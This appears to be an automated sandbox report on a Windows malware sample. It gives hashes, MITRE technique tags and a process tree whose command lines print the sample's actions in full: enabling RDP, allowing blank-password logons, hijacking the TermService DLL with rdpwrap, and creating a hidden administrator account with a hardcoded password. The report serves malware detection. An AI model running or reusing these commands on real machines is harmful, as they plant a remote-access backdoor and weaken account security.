11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855

Analysis

max time kernel
117s
max time network
125s
platform
windows7_x64
resource
win7-en-20211208
submitted
13-02-2022 15:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
Size

448KB
MD5

808189ade846e9d5855baed60727ee6e
SHA1

45a356565238d83b726852a4a69fa764a00c62f0
SHA256

11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855
SHA512

93542e23f5ffdb7bedc98b63595871d4da488d90e19e0e214de204ed11390bb61fddef239ebb51720372317da208a7aeab3d7783f5b426817a0b12993a6df010

Score

9^/10

discovery evasion exploit persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Executes dropped EXE 1 IoCs

Processes:

iv3yydjq.exe

pid process

1544 iv3yydjq.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible privilege escalation attempt 6 IoCs
exploit

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exe

pid process

744 icacls.exe
1684 icacls.exe
1720 takeown.exe
1008 icacls.exe
1516 icacls.exe
1588 takeown.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.

Remote Desktop Protocol
T1076

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" reg.exe
Modifies file permissions 1 TTPs 6 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1720 takeown.exe
1008 icacls.exe
1516 icacls.exe
1588 takeown.exe
744 icacls.exe
1684 icacls.exe

pid	process
1544	iv3yydjq.exe

pid	process
744	icacls.exe
1684	icacls.exe
1720	takeown.exe
1008	icacls.exe
1516	icacls.exe
1588	takeown.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0"	reg.exe

pid	process
1720	takeown.exe
1008	icacls.exe
1516	icacls.exe
1588	takeown.exe
744	icacls.exe
1684	icacls.exe

Drops file in Program Files directory 2 IoCs

Processes:

iv3yydjq.exe

description	ioc	process
File opened for modification	C:\Program Files\Common Files\Services\rdpwrap.ini	iv3yydjq.exe
File opened for modification	C:\Program Files\Common Files\Services\rdpwrap.dll	iv3yydjq.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

288 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

428 taskkill.exe
Runs net.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

iv3yydjq.exe

pid process

1544 iv3yydjq.exe

pid	process
288	schtasks.exe

pid	process
428	taskkill.exe

pid	process
1544	iv3yydjq.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe

pid	process
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
Token: SeDebugPrivilege	428	taskkill.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exeiv3yydjq.exe

pid	process
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
1544	iv3yydjq.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.execmd.exeiv3yydjq.execmd.execmd.execmd.exenet.exe

description	pid	process	target process
PID 744 wrote to memory of 1288	744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe	cmstp.exe
PID 744 wrote to memory of 1288	744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe	cmstp.exe
PID 744 wrote to memory of 1288	744	11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe	cmstp.exe
PID 1480 wrote to memory of 1544	1480	cmd.exe	iv3yydjq.exe
PID 1480 wrote to memory of 1544	1480	cmd.exe	iv3yydjq.exe
PID 1480 wrote to memory of 1544	1480	cmd.exe	iv3yydjq.exe
PID 1480 wrote to memory of 1544	1480	cmd.exe	iv3yydjq.exe
PID 1544 wrote to memory of 1764	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1764	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1764	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1764	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1336	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1336	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1336	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1336	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 968	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 968	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 968	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 968	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1696	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1696	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1696	1544	iv3yydjq.exe	cmd.exe
PID 1544 wrote to memory of 1696	1544	iv3yydjq.exe	cmd.exe
PID 968 wrote to memory of 1724	968	cmd.exe	choice.exe
PID 968 wrote to memory of 1724	968	cmd.exe	choice.exe
PID 968 wrote to memory of 1724	968	cmd.exe	choice.exe
PID 968 wrote to memory of 1724	968	cmd.exe	choice.exe
PID 1336 wrote to memory of 288	1336	cmd.exe	schtasks.exe
PID 1336 wrote to memory of 288	1336	cmd.exe	schtasks.exe
PID 1336 wrote to memory of 288	1336	cmd.exe	schtasks.exe
PID 1336 wrote to memory of 288	1336	cmd.exe	schtasks.exe
PID 1696 wrote to memory of 848	1696	cmd.exe	choice.exe
PID 1696 wrote to memory of 848	1696	cmd.exe	choice.exe
PID 1696 wrote to memory of 848	1696	cmd.exe	choice.exe
PID 1696 wrote to memory of 848	1696	cmd.exe	choice.exe
PID 1336 wrote to memory of 2044	1336	cmd.exe	choice.exe
PID 1336 wrote to memory of 2044	1336	cmd.exe	choice.exe
PID 1336 wrote to memory of 2044	1336	cmd.exe	choice.exe
PID 1336 wrote to memory of 2044	1336	cmd.exe	choice.exe
PID 1696 wrote to memory of 1720	1696	cmd.exe	takeown.exe
PID 1696 wrote to memory of 1720	1696	cmd.exe	takeown.exe
PID 1696 wrote to memory of 1720	1696	cmd.exe	takeown.exe
PID 1696 wrote to memory of 1720	1696	cmd.exe	takeown.exe
PID 968 wrote to memory of 1060	968	cmd.exe	net.exe
PID 968 wrote to memory of 1060	968	cmd.exe	net.exe
PID 968 wrote to memory of 1060	968	cmd.exe	net.exe
PID 968 wrote to memory of 1060	968	cmd.exe	net.exe
PID 1336 wrote to memory of 912	1336	cmd.exe	schtasks.exe
PID 1336 wrote to memory of 912	1336	cmd.exe	schtasks.exe
PID 1336 wrote to memory of 912	1336	cmd.exe	schtasks.exe
PID 1336 wrote to memory of 912	1336	cmd.exe	schtasks.exe
PID 1336 wrote to memory of 552	1336	cmd.exe	choice.exe
PID 1336 wrote to memory of 552	1336	cmd.exe	choice.exe
PID 1336 wrote to memory of 552	1336	cmd.exe	choice.exe
PID 1336 wrote to memory of 552	1336	cmd.exe	choice.exe
PID 1696 wrote to memory of 1008	1696	cmd.exe	icacls.exe
PID 1696 wrote to memory of 1008	1696	cmd.exe	icacls.exe
PID 1696 wrote to memory of 1008	1696	cmd.exe	icacls.exe
PID 1696 wrote to memory of 1008	1696	cmd.exe	icacls.exe
PID 1060 wrote to memory of 1736	1060	net.exe	net1.exe
PID 1060 wrote to memory of 1736	1060	net.exe	net1.exe
PID 1060 wrote to memory of 1736	1060	net.exe	net1.exe
PID 1060 wrote to memory of 1736	1060	net.exe	net1.exe
PID 1696 wrote to memory of 1516	1696	cmd.exe	icacls.exe

C:\Users\Admin\AppData\Local\Temp\11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
"C:\Users\Admin\AppData\Local\Temp\11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:744

\??\c:\windows\system32\cmstp.exe
"c:\windows\system32\cmstp.exe" /au c:\Users\Public\\qpcxh2bd.inf
2⤵
PID:1288

C:\Windows\system32\cmd.exe
cmd /c start c:\Users\Public\iv3yydjq.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1480

\??\c:\Users\Public\iv3yydjq.exe
c:\Users\Public\iv3yydjq.exe
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "C:\Program Files\Common Files\Services" & exit
3⤵
PID:1764

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks /create /tn "lst" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f & choice /n /c y /d y /t 3 > nul & schtasks /Run /tn "lst" & choice /n /c y /d y /t 3 > nul & schtasks /Delete /tn "lst" /f & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "lst" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f
4⤵
- Creates scheduled task(s)
PID:288

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:2044

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /tn "lst"
4⤵
PID:912

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:552

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn "lst" /f
4⤵
PID:760

C:\Windows\SysWOW64\cmd.exe
cmd /c choice /n /c y /d y /t 3 > nul & net user "Admin" " & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & net accounts /maxpwage:unlimited & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1724

C:\Windows\SysWOW64\net.exe
net user "Admin" " & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & net accounts /maxpwage:unlimited & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "Admin" " & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & net accounts /maxpwage:unlimited & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & exit
5⤵
PID:1736

C:\Windows\SysWOW64\cmd.exe
cmd /c choice /n /c y /d y /t 3 > nul & del /f /q "c:\Users\Public\iv3yydjq.exe" & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant "%USERNAME%":F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administrators:F & choice /n /c y /d y /t 3 > nul & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant "%USERNAME%":F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administrators:F & choice /n /c y /d y /t 3 > nul & net stop "TermService" /y & reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes & net user SysWOW64 t0or642531 /add /expires:never & choice /n /c y /d y /t 3 > nul & net localgroup Administrators SysWOW64 /add & net localgroup "Remote desktop users" SysWOW64 /add & choice /n /c y /d y /t 3 > nul & net localgroup "Remote desktop users" "Admin" /add & net start "TermService" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1696

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:848

C:\Windows\SysWOW64\takeown.exe
TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1720

C:\Windows\SysWOW64\icacls.exe
ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant "Admin":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1008

C:\Windows\SysWOW64\icacls.exe
ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administrators:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1516

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:876

C:\Windows\SysWOW64\takeown.exe
TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1588

C:\Windows\SysWOW64\icacls.exe
ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant "Admin":F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:744

C:\Windows\SysWOW64\icacls.exe
ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administrators:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1684

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1676

C:\Windows\SysWOW64\net.exe
net stop "TermService" /y
4⤵
PID:1540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "TermService" /y
5⤵
PID:2032

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f
4⤵
PID:1848

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
4⤵
PID:1032

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
4⤵
PID:1416

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f
4⤵
- Allows Network login with blank passwords
PID:1316

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1408

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
4⤵
PID:1176

C:\Windows\SysWOW64\net.exe
net user SysWOW64 t0or642531 /add /expires:never
4⤵
PID:1864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user SysWOW64 t0or642531 /add /expires:never
5⤵
PID:1660

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:984

C:\Windows\SysWOW64\net.exe
net localgroup Administrators SysWOW64 /add
4⤵
PID:992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators SysWOW64 /add
5⤵
PID:720

C:\Windows\SysWOW64\net.exe
net localgroup "Remote desktop users" SysWOW64 /add
4⤵
PID:848

